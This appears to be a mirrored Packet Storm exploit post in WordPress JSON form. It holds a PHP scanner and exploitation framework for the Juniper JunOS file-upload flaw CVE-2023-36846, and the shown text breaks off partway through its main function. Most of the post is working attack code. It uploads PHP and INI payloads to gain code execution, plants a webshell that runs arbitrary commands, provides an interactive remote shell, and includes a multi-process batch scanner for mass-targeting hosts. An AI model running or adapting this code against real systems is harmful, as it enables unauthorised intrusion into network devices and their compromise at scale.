{"id":37262,"date":"2026-01-26T12:39:47","date_gmt":"2026-01-26T12:39:47","guid":{"rendered":"http:\/\/localhost\/?p=37262"},"modified":"2026-01-26T12:39:47","modified_gmt":"2026-01-26T12:39:47","slug":"juniper-junos-234-module-scanner-exploitation-framework","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37262","title":{"rendered":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-26T18:14:52&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is designed with a clear separation of responsibilities and supports&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214349&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-36846&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Juniper Junos OS 23.4 Modular Scanner \\u0026 Exploitation Framework                                                              |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/support.juniper.net\/support\/eol\/software\/junos\/                                                                     |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213671\/ \\u0026 CVE-2023-36846\\n    \\n    [+] Summary    : This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846. \\n                     It is designed with a clear separation of responsibilities and supports single\u2011target testing, interactive exploitation, and large\u2011scale batch scanning.\\n    \\n    [+] Key Components \\u0026 Flow :\\n    \\n    Utilities (Utils)\\n    \\n    Helpers for screen clearing, URL normalization, and parsing target lists from files.\\n    \\n    HTTP Client (HttpClient)\\n    A reusable cURL wrapper with configurable timeouts, SSL verification, redirects, headers, and POST\/GET handling.\\n    \\n    [+] Vulnerability Scanner (JunOSVulnerabilityScanner) :\\n    \\n    Detects whether the vulnerable endpoint (webauth_operation.php) is accessible.\\n    \\n    Attempts controlled file uploads using multiple size heuristics.\\n    \\n    Uploads a PHP test payload and an INI file to trigger execution via PHPRC.\\n    \\n    Verifies vulnerability by checking for unique execution markers.\\n    \\n    Performs cleanup after testing.\\n    \\n    [+] Exploitation Module (JunOSExploiter) :\\n    \\n    Deploys a functional webshell using the same upload\/INI mechanism.\\n    \\n    Executes arbitrary commands through the webshell and captures output.\\n    \\n    Supports automated cleanup of deployed artifacts.\\n    \\n    [+] PoC : \\n    \\n    # Quick Scan\\n    `php junos_exploit.php -u https:\/\/target.com -r -v`\\n    \\n    # Interactive Shell\\n    `php junos_exploit.php -u https:\/\/target.com -v`\\n    \\n    # Bulk Scan\\n    `php junos_exploit.php -f targets.txt -t 10 -o results.txt`\\n    \\n    # Secure Scan (with SSL)\\n    `php junos_exploit.php -f targets.txt -s -v`\\n    \\n    \\n    \\u003c?php\\n    \\n    \\n    class Utils {\\n        public static function clearScreen() {\\n            if (strtoupper(substr(PHP_OS, 0, 3)) === &#8216;WIN&#8217;) {\\n                system(&#8216;cls&#8217;);\\n            } else {\\n                system(&#8216;clear&#8217;);\\n            }\\n        }\\n        \\n        public static function parseUrlsFile($filename) {\\n            $urls = [];\\n            if (!file_exists($filename)) {\\n                throw new Exception(\\&#8221;File not found: {$filename}\\&#8221;);\\n            }\\n            \\n            $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n            foreach ($lines as $line) {\\n                $line = trim($line);\\n                if (!empty($line) \\u0026\\u0026 filter_var($line, FILTER_VALIDATE_URL)) {\\n                    $urls[] = $line;\\n                }\\n            }\\n            \\n            return $urls;\\n        }\\n        \\n        public static function normalizeUrl($url) {\\n            $url = rtrim($url, &#8216;\/&#8217;);\\n            if (!preg_match(&#8216;#^https?:\/\/#&#8217;, $url)) {\\n                $url = &#8216;https:\/\/&#8217; . $url;\\n            }\\n            return $url;\\n        }\\n    }\\n    \\n    class HttpClient {\\n        private $verifySSL = false;\\n        private $timeout = 15;\\n        private $userAgent = &#8216;Mozilla\/5.0 (compatible; JunOS-Scanner\/1.0)&#8217;;\\n        \\n        public function __construct($options = []) {\\n            $this-\\u003everifySSL = $options[&#8216;verify_ssl&#8217;] ?? false;\\n            $this-\\u003etimeout = $options[&#8216;timeout&#8217;] ?? 15;\\n        }\\n        \\n        public function setVerifySSL($verify) {\\n            $this-\\u003everifySSL = $verify;\\n        }\\n        \\n        public function request($url, $method = &#8216;GET&#8217;, $data = null, $headers = []) {\\n            $ch = curl_init();\\n            \\n            $curlOptions = [\\n                CURLOPT_URL =\\u003e $url,\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_MAXREDIRS =\\u003e 3,\\n                CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n                CURLOPT_CONNECTTIMEOUT =\\u003e 5,\\n                CURLOPT_USERAGENT =\\u003e $this-\\u003euserAgent,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everifySSL,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everifySSL ? 2 : 0,\\n            ];\\n            \\n            $defaultHeaders = [];\\n            if (!isset($headers[&#8216;Content-Type&#8217;]) \\u0026\\u0026 $method === &#8216;POST&#8217;) {\\n                $defaultHeaders[] = &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;;\\n            }\\n            \\n            $allHeaders = array_merge($defaultHeaders, $headers);\\n            if (!empty($allHeaders)) {\\n                $curlOptions[CURLOPT_HTTPHEADER] = $allHeaders;\\n            }\\n            \\n            if ($method === &#8216;POST&#8217;) {\\n                $curlOptions[CURLOPT_POST] = true;\\n                if ($data !== null) {\\n                    if (is_array($data)) {\\n                        $curlOptions[CURLOPT_POSTFIELDS] = http_build_query($data);\\n                    } else {\\n                        $curlOptions[CURLOPT_POSTFIELDS] = $data;\\n                    }\\n                }\\n            }\\n            \\n            curl_setopt_array($ch, $curlOptions);\\n            \\n            $response = curl_exec($ch);\\n            $info = curl_getinfo($ch);\\n            $error = curl_error($ch);\\n            $errno = curl_errno($ch);\\n            \\n            curl_close($ch);\\n            \\n            return [\\n                &#8216;success&#8217; =\\u003e $errno === 0,\\n                &#8216;response&#8217; =\\u003e $response,\\n                &#8216;http_code&#8217; =\\u003e $info[&#8216;http_code&#8217;] ?? 0,\\n                &#8216;error&#8217; =\\u003e $error,\\n                &#8216;errno&#8217; =\\u003e $errno,\\n                &#8216;info&#8217; =\\u003e $info,\\n            ];\\n        }\\n    }\\n    \\n    class JunOSVulnerabilityScanner {\\n        private $httpClient;\\n        private $baseUrl;\\n        private $verbose;\\n        private $randomPrefix;\\n        \\n        public function __construct($baseUrl, $verbose = false, $verifySSL = false) {\\n            $this-\\u003ebaseUrl = Utils::normalizeUrl($baseUrl);\\n            $this-\\u003everbose = $verbose;\\n            $this-\\u003erandomPrefix = &#8216;wt_&#8217; . bin2hex(random_bytes(4));\\n            $this-\\u003ehttpClient = new HttpClient([&#8216;verify_ssl&#8217; =\\u003e $verifySSL]);\\n            \\n            if ($verbose) {\\n                echo \\&#8221;[DEBUG] Scanner initialized for: {$this-\\u003ebaseUrl}\\\\n\\&#8221;;\\n                echo \\&#8221;[DEBUG] Random prefix: {$this-\\u003erandomPrefix}\\\\n\\&#8221;;\\n            }\\n        }\\n        \\n        public function testUploadEndpoint() {\\n            $url = $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php\\&#8221;;\\n            $response = $this-\\u003ehttpClient-\\u003erequest($url);\\n            \\n            if ($response[&#8216;http_code&#8217;] === 404 || $response[&#8216;http_code&#8217;] === 403) {\\n                return false;\\n            }\\n            \\n    \\n            $testData = [&#8216;rs&#8217; =\\u003e &#8216;test&#8217;];\\n            $response = $this-\\u003ehttpClient-\\u003erequest($url, &#8216;POST&#8217;, $testData);\\n            \\n            return $response[&#8216;http_code&#8217;] === 200;\\n        }\\n        \\n        private function attemptUpload($payload, $filename, $mimeType = &#8216;text\/html&#8217;) {\\n            $uploadUrl = $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php\\&#8221;;\\n            \\n            $sizeAttempts = [\\n                strlen(base64_encode($payload)), \\n                strlen($payload), \\n                strlen(base64_encode($payload)) * 2, \\n            ];\\n            \\n            foreach ($sizeAttempts as $csize) {\\n                $b64Payload = base64_encode($payload);\\n                $fileData = \\&#8221;data:{$mimeType};base64,{$b64Payload}\\&#8221;;\\n                \\n                $postData = [\\n                    &#8216;rs&#8217; =\\u003e &#8216;do_upload&#8217;,\\n                    &#8216;rsargs[0]&#8217; =\\u003e \\&#8221;[{\\\\\\&#8221;fileData\\\\\\&#8221;:\\\\\\&#8221;{$fileData}\\\\\\&#8221;,\\\\\\&#8221;fileName\\\\\\&#8221;:\\\\\\&#8221;{$filename}\\\\\\&#8221;,\\\\\\&#8221;csize\\\\\\&#8221;:{$csize}}]\\&#8221;\\n                ];\\n                \\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[DEBUG] Attempting upload with csize={$csize}\\\\n\\&#8221;;\\n                }\\n                \\n                $response = $this-\\u003ehttpClient-\\u003erequest($uploadUrl, &#8216;POST&#8217;, $postData);\\n                \\n                if (!$response[&#8216;success&#8217;] || $response[&#8216;http_code&#8217;] !== 200) {\\n                    continue;\\n                }\\n                \\n                $patterns = [\\n                    &#8216;\/0:\\\\s*\\\\'([^\\\\&#8217;]+)\\\\&#8217;\\\\s*\\\\},\/&#8217;,\\n                    &#8216;\/\\&#8221;0\\&#8221;:\\&#8221;([^\\&#8221;]+)\\&#8221;\/&#8217;,\\n                    &#8216;\/\\\\&#8217;0\\\\&#8217;:\\\\'([^\\\\&#8217;]+)\\\\&#8217;\/&#8217;,\\n                    &#8216;\/filename[\\&#8221;\\\\&#8217;]?\\\\s*:\\\\s*[\\&#8221;\\\\&#8217;]?([^\\&#8221;\\\\&#8217;\\\\s,]+)\/i&#8217;,\\n                ];\\n                \\n                foreach ($patterns as $pattern) {\\n                    if (preg_match($pattern, $response[&#8216;response&#8217;], $matches)) {\\n                        $uploadedFile = $matches[1];\\n                        \\n                        if (strpos($uploadedFile, &#8216;..&#8217;) !== false || strpos($uploadedFile, &#8216;\/&#8217;) !== false) {\\n                            continue;\\n                        }\\n                        \\n                        if ($this-\\u003everbose) {\\n                            echo \\&#8221;[DEBUG] Extracted filename: {$uploadedFile}\\\\n\\&#8221;;\\n                        }\\n                        \\n                        return $uploadedFile;\\n                    }\\n                }\\n                \\n                if (strpos($response[&#8216;response&#8217;], &#8216;fileName&#8217;) !== false) {\\n                    \\n                    $jsonMatch = [];\\n                    if (preg_match(&#8216;\/\\\\{\\&#8221;?0\\&#8221;?:\\\\s*\\&#8221;([^\\&#8221;]+)\\&#8221;\\\\}\/&#8217;, $response[&#8216;response&#8217;], $jsonMatch)) {\\n                        return $jsonMatch[1];\\n                    }\\n                }\\n            }\\n            \\n            return null;\\n        }\\n        \\n        public function testVulnerability() {\\n            if ($this-\\u003everbose) {\\n                echo \\&#8221;[*] Testing vulnerability for: {$this-\\u003ebaseUrl}\\\\n\\&#8221;;\\n            }\\n            \\n            if (!$this-\\u003etestUploadEndpoint()) {\\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[-] Upload endpoint not accessible\\\\n\\&#8221;;\\n                }\\n                return false;\\n            }\\n            \\n            $uniqueToken = $this-\\u003erandomPrefix . &#8216;_test_&#8217; . bin2hex(random_bytes(4));\\n            $phpPayload = \\&#8221;\\u003c?php echo &#8216;[S]&#8217; . &#8216;{$uniqueToken}&#8217; . &#8216;[E]&#8217;; ?\\u003e\\&#8221;;\\n            \\n            $phpFile = $this-\\u003eattemptUpload($phpPayload, $this-\\u003erandomPrefix . &#8216;.php&#8217;);\\n            \\n            if ($phpFile === null) {\\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[-] PHP upload failed\\\\n\\&#8221;;\\n                }\\n                return false;\\n            }\\n            \\n    \\n            $iniPayload = &#8216;auto_prepend_file=\\&#8221;\/var\/tmp\/&#8217; . $phpFile . &#8216;\\&#8221;&#8216;;\\n            $iniFile = $this-\\u003eattemptUpload($iniPayload, $this-\\u003erandomPrefix . &#8216;.ini&#8217;, &#8216;text\/plain&#8217;);\\n            \\n            if ($iniFile === null) {\\n    \\n                $this-\\u003eattemptCleanup($phpFile, null);\\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[-] INI upload failed\\\\n\\&#8221;;\\n                }\\n                return false;\\n            }\\n            \\n    \\n            $testUrl = $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\&#8221;;\\n            $response = $this-\\u003ehttpClient-\\u003erequest($testUrl);\\n            \\n            $isVulnerable = false;\\n            $cleanupFiles = [&#8216;php&#8217; =\\u003e $phpFile, &#8216;ini&#8217; =\\u003e $iniFile];\\n            \\n    \\n            if (strpos($response[&#8216;response&#8217;], $uniqueToken) !== false) {\\n                $isVulnerable = true;\\n            } else {\\n    \\n                $cmdTestUrl = $testUrl . \\&#8221;\\u00260=echo+\\&#8221; . urlencode($uniqueToken);\\n                $cmdResponse = $this-\\u003ehttpClient-\\u003erequest($cmdTestUrl);\\n                \\n                if (strpos($cmdResponse[&#8216;response&#8217;], $uniqueToken) !== false) {\\n                    $isVulnerable = true;\\n                } else {\\n    \\n                    if (preg_match(&#8216;\/\\\\[S\\\\](.*?)\\\\[E\\\\]\/s&#8217;, $cmdResponse[&#8216;response&#8217;], $matches)) {\\n                        if (strpos($matches[1], $uniqueToken) !== false) {\\n                            $isVulnerable = true;\\n                        }\\n                    }\\n                }\\n            }\\n            \\n            $this-\\u003eattemptCleanup($phpFile, $iniFile);\\n            \\n            return $isVulnerable;\\n        }\\n        \\n        private function attemptCleanup($phpFile, $iniFile) {\\n    \\n            if ($phpFile) {\\n                $cleanupUrl = $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\u0026delete=1\\&#8221;;\\n                $this-\\u003ehttpClient-\\u003erequest($cleanupUrl);\\n            }\\n            \\n    \\n            if ($iniFile) {\\n    \\n                $emptyIni = &#8221;;\\n                $this-\\u003eattemptUpload($emptyIni, $iniFile, &#8216;text\/plain&#8217;);\\n            }\\n        }\\n        \\n        public function getExploitInstance() {\\n            return new JunOSExploiter($this-\\u003ebaseUrl, $this-\\u003everbose, $this-\\u003ehttpClient, $this-\\u003erandomPrefix);\\n        }\\n    }\\n    \\n    class JunOSExploiter {\\n        private $baseUrl;\\n        private $httpClient;\\n        private $verbose;\\n        private $randomPrefix;\\n        private $uploadedFiles = [];\\n        \\n        public function __construct($baseUrl, $verbose, $httpClient, $randomPrefix) {\\n            $this-\\u003ebaseUrl = $baseUrl;\\n            $this-\\u003ehttpClient = $httpClient;\\n            $this-\\u003everbose = $verbose;\\n            $this-\\u003erandomPrefix = $randomPrefix;\\n        }\\n        \\n        public function deployWebshell() {\\n            $phpFilename = $this-\\u003erandomPrefix . &#8216;_shell.php&#8217;;\\n            $iniFilename = $this-\\u003erandomPrefix . &#8216;_config.ini&#8217;;\\n            \\n    \\n            $phpPayload = \\u003c\\u003c\\u003c&#8217;PHP&#8217;\\n    \\u003c?php\\n    if(isset($_GET[&#8216;cleanup&#8217;])) {\\n        @unlink(__FILE__);\\n        if(isset($_GET[&#8216;ini&#8217;])) {\\n            $iniFile = &#8216;\/var\/tmp\/&#8217; . basename($_GET[&#8216;ini&#8217;]);\\n            @unlink($iniFile);\\n        }\\n        exit;\\n    }\\n    if(isset($_GET[&#8216;cmd&#8217;])) {\\n        echo &#8216;[S]&#8217;;\\n        system($_GET[&#8216;cmd&#8217;]);\\n        echo &#8216;[E]&#8217;;\\n    }\\n    ?\\u003e\\n    PHP;\\n    \\n            $scanner = new JunOSVulnerabilityScanner($this-\\u003ebaseUrl, $this-\\u003everbose);\\n            \\n            $phpFile = $scanner-\\u003eattemptUpload($phpPayload, $phpFilename);\\n            if (!$phpFile) {\\n                throw new Exception(\\&#8221;Failed to upload PHP webshell\\&#8221;);\\n            }\\n            \\n            $iniPayload = &#8216;auto_prepend_file=\\&#8221;\/var\/tmp\/&#8217; . $phpFile . &#8216;\\&#8221;&#8216;;\\n            $iniFile = $scanner-\\u003eattemptUpload($iniPayload, $iniFilename, &#8216;text\/plain&#8217;);\\n            \\n            if (!$iniFile) {\\n                throw new Exception(\\&#8221;Failed to upload INI configuration\\&#8221;);\\n            }\\n            \\n            $this-\\u003euploadedFiles = [\\n                &#8216;php&#8217; =\\u003e $phpFile,\\n                &#8216;ini&#8217; =\\u003e $iniFile,\\n                &#8216;shell_url&#8217; =\\u003e $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\&#8221;\\n            ];\\n            \\n            $testUrl = $this-\\u003euploadedFiles[&#8216;shell_url&#8217;] . \\&#8221;\\u0026cmd=whoami\\&#8221;;\\n            $testResponse = $this-\\u003ehttpClient-\\u003erequest($testUrl);\\n            \\n            if (!preg_match(&#8216;\/\\\\[S\\\\].*\\\\[E\\\\]\/s&#8217;, $testResponse[&#8216;response&#8217;])) {\\n                $this-\\u003ecleanup();\\n                throw new Exception(\\&#8221;Webshell deployed but not functional\\&#8221;);\\n            }\\n            \\n            return $this-\\u003euploadedFiles;\\n        }\\n        \\n        public function executeCommand($command) {\\n            if (empty($this-\\u003euploadedFiles)) {\\n                throw new Exception(\\&#8221;Webshell not deployed\\&#8221;);\\n            }\\n            \\n            $url = $this-\\u003euploadedFiles[&#8216;shell_url&#8217;] . \\&#8221;\\u0026cmd=\\&#8221; . urlencode($command);\\n            $response = $this-\\u003ehttpClient-\\u003erequest($url);\\n            \\n            if (preg_match(&#8216;\/\\\\[S\\\\](.*?)\\\\[E\\\\]\/s&#8217;, $response[&#8216;response&#8217;], $matches)) {\\n                return trim($matches[1]);\\n            }\\n            \\n            return $response[&#8216;response&#8217;];\\n        }\\n        \\n        public function cleanup() {\\n            if (empty($this-\\u003euploadedFiles)) {\\n                return false;\\n            }\\n            \\n            $cleanupUrl = $this-\\u003ebaseUrl . \\&#8221;\/webauth_operation.php?PHPRC=\/var\/tmp\/{$this-\\u003euploadedFiles[&#8216;ini&#8217;]}\\u0026cleanup=1\\u0026ini={$this-\\u003euploadedFiles[&#8216;ini&#8217;]}\\&#8221;;\\n            $this-\\u003ehttpClient-\\u003erequest($cleanupUrl);\\n            \\n            $this-\\u003euploadedFiles = [];\\n            return true;\\n        }\\n        \\n        public function __destruct() {\\n            $this-\\u003ecleanup();\\n        }\\n    }\\n    \\n    class InteractiveShell {\\n        private $exploiter;\\n        private $isWindows;\\n        \\n        public function __construct($exploiter) {\\n            $this-\\u003eexploiter = $exploiter;\\n            $this-\\u003eisWindows = strtoupper(substr(PHP_OS, 0, 3)) === &#8216;WIN&#8217;;\\n        }\\n        \\n        public function run() {\\n            echo \\&#8221;\\\\n\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;JunOS Interactive Shell\\\\n\\&#8221;;\\n            echo \\&#8221;Type &#8216;exit&#8217; or &#8216;quit&#8217; to leave (auto-cleanup enabled)\\\\n\\&#8221;;\\n            echo \\&#8221;Type &#8216;clear&#8217; to clear screen\\\\n\\&#8221;;\\n            echo \\&#8221;Type &#8216;help&#8217; for commands\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n    \\n            $stdin = fopen(&#8216;php:\/\/stdin&#8217;, &#8216;r&#8217;);\\n            \\n            while (true) {\\n                echo \\&#8221;junos\\u003e \\&#8221;;\\n                $command = trim(fgets($stdin));\\n                \\n                if (empty($command)) {\\n                    continue;\\n                }\\n                \\n                $cmdLower = strtolower($command);\\n                \\n                if (in_array($cmdLower, [&#8216;exit&#8217;, &#8216;quit&#8217;])) {\\n                    echo \\&#8221;[*] Exiting and cleaning up&#8230;\\\\n\\&#8221;;\\n                    break;\\n                } elseif ($cmdLower === &#8216;clear&#8217;) {\\n                    Utils::clearScreen();\\n                    continue;\\n                } elseif ($cmdLower === &#8216;help&#8217;) {\\n                    $this-\\u003eshowHelp();\\n                    continue;\\n                } elseif ($cmdLower === &#8216;pwd&#8217;) {\\n    \\n                    $command = &#8216;pwd&#8217;;\\n                }\\n                \\n                try {\\n                    $result = $this-\\u003eexploiter-\\u003eexecuteCommand($command);\\n                    echo \\&#8221;[+] Result:\\\\n\\&#8221; . $result . \\&#8221;\\\\n\\&#8221;;\\n                } catch (Exception $e) {\\n                    echo \\&#8221;[!] Error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            fclose($stdin);\\n        }\\n        \\n        private function showHelp() {\\n            echo \\&#8221;\\\\nAvailable commands:\\\\n\\&#8221;;\\n            echo \\&#8221;  exit, quit     &#8211; Exit shell and cleanup\\\\n\\&#8221;;\\n            echo \\&#8221;  clear          &#8211; Clear screen\\\\n\\&#8221;;\\n            echo \\&#8221;  help           &#8211; Show this help\\\\n\\&#8221;;\\n            echo \\&#8221;  whoami         &#8211; Check current user\\\\n\\&#8221;;\\n            echo \\&#8221;  pwd            &#8211; Print working directory\\\\n\\&#8221;;\\n            echo \\&#8221;  id             &#8211; Show user\/group IDs\\\\n\\&#8221;;\\n            echo \\&#8221;  ls [dir]       &#8211; List directory\\\\n\\&#8221;;\\n            echo \\&#8221;  cat \\u003cfile\\u003e     &#8211; View file\\\\n\\&#8221;;\\n            echo \\&#8221;  uname -a       &#8211; System info\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    class BatchScanner {\\n        private $threads;\\n        private $outputFile;\\n        private $verbose;\\n        private $verifySSL;\\n        \\n        public function __construct($threads = 5, $outputFile = null, $verbose = false, $verifySSL = false) {\\n            $this-\\u003ethreads = max(1, min($threads, 50));\\n            $this-\\u003eoutputFile = $outputFile;\\n            $this-\\u003everbose = $verbose;\\n            $this-\\u003everifySSL = $verifySSL;\\n        }\\n        \\n        public function scanUrls($urls) {\\n            $total = count($urls);\\n            $vulnerable = 0;\\n            $results = [];\\n            \\n            echo \\&#8221;[*] Starting batch scan with {$this-\\u003ethreads} threads\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Targets: {$total}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] SSL Verification: \\&#8221; . ($this-\\u003everifySSL ? \\&#8221;ON\\&#8221; : \\&#8221;OFF\\&#8221;) . \\&#8221;\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;-\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            \\n    \\n            $chunks = array_chunk($urls, ceil($total \/ $this-\\u003ethreads));\\n            $workers = [];\\n            \\n            foreach ($chunks as $chunkIndex =\\u003e $chunk) {\\n                $pid = pcntl_fork();\\n                \\n                if ($pid == -1) {\\n           \\n                    die(\\&#8221;Could not fork\\&#8221;);\\n                } elseif ($pid) {\\n                    \/\/ Parent process\\n                    $workers[] = $pid;\\n                } else {\\n                    \/\/ Child process\\n                    $childResults = [];\\n                    foreach ($chunk as $url) {\\n                        try {\\n                            $scanner = new JunOSVulnerabilityScanner($url, $this-\\u003everbose, $this-\\u003everifySSL);\\n                            $isVuln = $scanner-\\u003etestVulnerability();\\n                            \\n                            if ($isVuln) {\\n                                $childResults[] = $url;\\n                                echo \\&#8221;[+] {$url} &#8211; VULNERABLE (PID: \\&#8221; . getmypid() . \\&#8221;)\\\\n\\&#8221;;\\n                            } elseif ($this-\\u003everbose) {\\n                                echo \\&#8221;[-] {$url} &#8211; NOT vulnerable (PID: \\&#8221; . getmypid() . \\&#8221;)\\\\n\\&#8221;;\\n                            }\\n                        } catch (Exception $e) {\\n                            if ($this-\\u003everbose) {\\n                                echo \\&#8221;[!] {$url} &#8211; ERROR: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                            }\\n                        }\\n                    }\\n                    \\n                    $resultFile = sys_get_temp_dir() . &#8216;\/junos_scan_&#8217; . getmypid() . &#8216;.tmp&#8217;;\\n                    file_put_contents($resultFile, implode(\\&#8221;\\\\n\\&#8221;, $childResults));\\n                    exit(0);\\n                }\\n            }\\n            \\n            foreach ($workers as $pid) {\\n                pcntl_waitpid($pid, $status);\\n                \\n                $resultFile = sys_get_temp_dir() . &#8216;\/junos_scan_&#8217; . $pid . &#8216;.tmp&#8217;;\\n                if (file_exists($resultFile)) {\\n                    $childUrls = file($resultFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n                    $results = array_merge($results, $childUrls);\\n                    unlink($resultFile);\\n                }\\n            }\\n            \\n            if (empty($workers)) {\\n                \/\/ \u0645\u0639\u0627\u0644\u062c\u0629 \u0645\u062a\u0633\u0644\u0633\u0644\u0629\\n                foreach ($urls as $url) {\\n                    try {\\n                        $scanner = new JunOSVulnerabilityScanner($url, $this-\\u003everbose, $this-\\u003everifySSL);\\n                        $isVuln = $scanner-\\u003etestVulnerability();\\n                        \\n                        if ($isVuln) {\\n                            $results[] = $url;\\n                            echo \\&#8221;[+] {$url} &#8211; VULNERABLE\\\\n\\&#8221;;\\n                        } elseif ($this-\\u003everbose) {\\n                            echo \\&#8221;[-] {$url} &#8211; NOT vulnerable\\\\n\\&#8221;;\\n                        }\\n                    } catch (Exception $e) {\\n                        if ($this-\\u003everbose) {\\n                            echo \\&#8221;[!] {$url} &#8211; ERROR: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                        }\\n                    }\\n                }\\n            }\\n            \\n            if ($this-\\u003eoutputFile \\u0026\\u0026 !empty($results)) {\\n                file_put_contents($this-\\u003eoutputFile, implode(\\&#8221;\\\\n\\&#8221;, $results) . \\&#8221;\\\\n\\&#8221;, LOCK_EX);\\n                echo \\&#8221;[*] Results saved to: {$this-\\u003eoutputFile}\\\\n\\&#8221;;\\n            }\\n            \\n            echo str_repeat(\\&#8221;-\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Scan completed. Vulnerable: \\&#8221; . count($results) . \\&#8221;\/{$total}\\\\n\\&#8221;;\\n            \\n            return $results;\\n        }\\n    }\\n    \\n    function main() {\\n        $options = getopt(\\&#8221;t:o:f:u:vsrh\\&#8221;, [\\n            \\&#8221;threads:\\&#8221;, \\&#8221;output:\\&#8221;, \\&#8221;file:\\&#8221;, \\&#8221;url:\\&#8221;, \\n            \\&#8221;verbose\\&#8221;, \\&#8221;ssl\\&#8221;, \\&#8221;report\\&#8221;, \\&#8221;help\\&#8221;\\n        ]);\\n        \\n    \\n        if (isset($options[&#8216;h&#8217;]) || isset($options[&#8216;help&#8217;])) {\\n            showHelp();\\n            exit(0);\\n        }\\n        \\n    \\n        $threads = isset($options[&#8216;t&#8217;]) ? (int)$options[&#8216;t&#8217;] : \\n                   (isset($options[&#8216;threads&#8217;]) ? (int)$options[&#8216;threads&#8217;] : 5);\\n        $output = isset($options[&#8216;o&#8217;]) ? $options[&#8216;o&#8217;] : \\n                  (isset($options[&#8216;output&#8217;]) ? $options[&#8216;output&#8217;] : null);\\n        $file = isset($options[&#8216;f&#8217;]) ? $options[&#8216;f&#8217;] : \\n                (isset($options[&#8216;file&#8217;]) ? $options[&#8216;file&#8217;] : null);\\n        $url = isset($options[&#8216;u&#8217;]) ? $options[&#8216;u&#8217;] : \\n               (isset($options[&#8216;url&#8217;]) ? $options[&#8216;url&#8217;] : null);\\n        $verbose = isset($options[&#8216;v&#8217;]) || isset($options[&#8216;verbose&#8217;]);\\n        $verifySSL = isset($options[&#8216;s&#8217;]) || isset($options[&#8216;ssl&#8217;]);\\n        $reportOnly = isset($options[&#8216;r&#8217;]) || isset($options[&#8216;report&#8217;]);\\n        \\n    \\n        if ($url \\u0026\\u0026 $reportOnly) {\\n            echo \\&#8221;[*] Quick vulnerability check for: {$url}\\\\n\\&#8221;;\\n            $scanner = new JunOSVulnerabilityScanner($url, true, $verifySSL);\\n            $isVuln = $scanner-\\u003etestVulnerability();\\n            \\n            if ($isVuln) {\\n                echo \\&#8221;\\\\n[\u2713] TARGET IS VULNERABLE TO CVE-2023-36846\\\\n\\&#8221;;\\n                exit(0);\\n            } else {\\n                echo \\&#8221;\\\\n[\u2717] Target is NOT vulnerable\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n        }\\n        \\n    \\n        if ($url \\u0026\\u0026 !$reportOnly) {\\n            echo \\&#8221;[*] Starting interactive mode for: {$url}\\\\n\\&#8221;;\\n            \\n            try {\\n    \\n                $scanner = new JunOSVulnerabilityScanner($url, true, $verifySSL);\\n                if (!$scanner-\\u003etestVulnerability()) {\\n                    echo \\&#8221;[!] Target does not appear to be vulnerable\\\\n\\&#8221;;\\n                    echo \\&#8221;[?] Continue anyway? (y\/N): \\&#8221;;\\n                    $confirm = trim(fgets(STDIN));\\n                  